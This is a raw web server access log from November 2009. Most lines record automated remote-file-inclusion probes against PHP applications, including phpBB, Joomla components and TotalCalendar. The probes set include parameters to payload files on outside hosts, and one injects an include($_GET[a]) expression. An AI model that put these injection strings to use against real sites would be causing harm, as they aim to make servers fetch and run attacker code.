217.29.159.130 - - [01/Nov/2009:00:41:11 -0400] "GET /logs/access_log.Q109052200/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kingstonu3a.org.uk/includes/js/dtree/img/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.29.159.130 - - [01/Nov/2009:00:41:11 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kingstonu3a.org.uk/includes/js/dtree/img/db.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.29.159.130 - - [01/Nov/2009:00:41:11 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kingstonu3a.org.uk/includes/js/dtree/img/db.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
222.122.46.179 - - [01/Nov/2009:00:41:18 -0400] "GET /?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:41:18 -0400] "GET /logs/error_log.Q109060900/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:41:18 -0400] "GET /logs/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 24198 "-" "Mozilla/5.0"
217.29.159.130 - - [01/Nov/2009:00:41:28 -0400] "GET /logs/access_log.Q109062900/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.kingstonu3a.org.uk/includes/js/dtree/img/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.78.116.203 - - [01/Nov/2009:00:41:58 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:41:59 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:41:59 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:00 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:00 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:00 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:01 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:01 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:42:01 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:00:42:24 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.97.43.5 - - [01/Nov/2009:00:42:30 -0400] "GET //skin/sirini_ezset_fullpack/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.97.43.5 - - [01/Nov/2009:00:42:30 -0400] "GET /logs//skin/sirini_ezset_fullpack/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
74.75.71.212 - - [01/Nov/2009:00:42:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MSN Optimized;US)"
74.75.71.212 - - [01/Nov/2009:00:42:31 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MSN Optimized;US)"
74.75.71.212 - - [01/Nov/2009:00:42:32 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MSN Optimized;US)"
74.75.71.212 - - [01/Nov/2009:00:42:32 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MSN Optimized;US)"
66.244.236.249 - - [01/Nov/2009:00:43:19 -0400] "GET /components/com_extcalendar/errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.49.188.178 - - [01/Nov/2009:00:43:23 -0400] "GET /logs/access_log.Q109052200/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
200.49.188.178 - - [01/Nov/2009:00:43:23 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
200.49.188.178 - - [01/Nov/2009:00:43:23 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.78.116.203 - - [01/Nov/2009:00:43:38 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:43:39 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
121.78.116.203 - - [01/Nov/2009:00:43:53 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://toilet.fileave.com/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
94.198.53.208 - - [01/Nov/2009:00:43:54 -0400] "GET /logs/access_log.Q109102000//bbs//skin/sirini_ezset_fullpack/setup.php?dir=http://www.kim-key.cn/bbs//skin/zero_vote/id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:00:43:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.174.0.17 - - [01/Nov/2009:00:44:03 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.49.188.178 - - [01/Nov/2009:00:44:04 -0400] "GET /logs/access_log.Q109062900/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
93.174.0.17 - - [01/Nov/2009:00:44:14 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:44:14 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.97.43.5 - - [01/Nov/2009:00:44:21 -0400] "GET //skin/sirini_ezset_fullpack/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.97.43.5 - - [01/Nov/2009:00:44:21 -0400] "GET /logs//skin/sirini_ezset_fullpack/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:44:25 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:44:25 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:44:26 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:44:57 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:45:06 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.65.200 - - [01/Nov/2009:00:45:14 -0400] "GET /logs/access_log.Q109081400 HTTP/1.1" 200 5006864 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.78.112.195 - - [01/Nov/2009:00:45:44 -0400] "GET /errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:44 -0400] "GET /logs/access_log.Q109090800/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:44 -0400] "GET /logs/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:45 -0400] "GET /logs/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:46 -0400] "GET /errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:46 -0400] "GET /logs/access_log.Q109090800/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:46 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:48 -0400] "GET /logs/access_log.Q109090800/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:48 -0400] "GET /logs/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:49 -0400] "GET /errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:50 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.112.195 - - [01/Nov/2009:00:45:53 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.218.116.132 - - [01/Nov/2009:00:46:31 -0400] "GET /logs/access_log.Q109102200 HTTP/1.0" 200 5276074 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.254.43.167 - - [01/Nov/2009:00:46:45 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko)"
67.228.191.194 - - [01/Nov/2009:00:47:16 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:16 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:16 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:22 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:22 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:22 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:00:47:20 -0400] "GET /logs/error_log.Q109102100 HTTP/1.0" 200 3051524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.228.191.194 - - [01/Nov/2009:00:47:29 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:29 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:29 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
74.75.71.212 - - [01/Nov/2009:00:47:38 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.1.3; MSN Optimized;US)"
93.174.0.17 - - [01/Nov/2009:00:47:40 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:47:40 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:47:41 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:47:41 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:47:42 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:47:42 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:47:43 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:47:43 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:47:44 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:44 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:00:47:23 -0400] "GET /logs/error_log.Q109102100 HTTP/1.0" 200 3051524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.228.191.194 - - [01/Nov/2009:00:47:51 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:47:58 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:48:19 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:48:19 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:48:19 -0400] "GET /logs/access_log.Q109081700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
95.211.6.161 - - [01/Nov/2009:00:48:30 -0400] "GET /logs/error_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:30 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:30 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:30 -0400] "GET /logs/access_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:31 -0400] "GET /logs/error_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:31 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:31 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
95.211.6.161 - - [01/Nov/2009:00:48:31 -0400] "GET /logs/access_log.Q109082200//admin/spaw/spaw_control.class.php?spaw_root=http://dwno.or.kr/bbs/icon/v.jpg???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
202.123.212.188 - - [01/Nov/2009:00:48:33 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:48:41 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:48:47 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.228.191.194 - - [01/Nov/2009:00:48:48 -0400] "GET /logs/access_log.Q109082100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:00:48:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.174.0.17 - - [01/Nov/2009:00:49:18 -0400] "GET /index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:49:18 -0400] "GET /logs/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:49:18 -0400] "GET /logs/access_log.Q109062100%20%20/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.174.0.17 - - [01/Nov/2009:00:49:31 -0400] "GET /logs/access_log.Q109061800%20%20/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:50:39 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:50:39 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.123.212.188 - - [01/Nov/2009:00:50:39 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.143.3.188 - - [01/Nov/2009:00:51:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.61 [en] (OS/2; U)"
174.143.3.188 - - [01/Nov/2009:00:51:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
174.143.3.188 - - [01/Nov/2009:00:51:16 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [01/Nov/2009:00:51:16 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Avant Browser (http://www.avantbrowser.com)"
202.123.212.188 - - [01/Nov/2009:00:51:44 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
202.122.19.24 - - [01/Nov/2009:00:52:26 -0400] "GET //atom.php5?page=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
202.122.19.24 - - [01/Nov/2009:00:52:26 -0400] "GET /logs//atom.php5?page=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
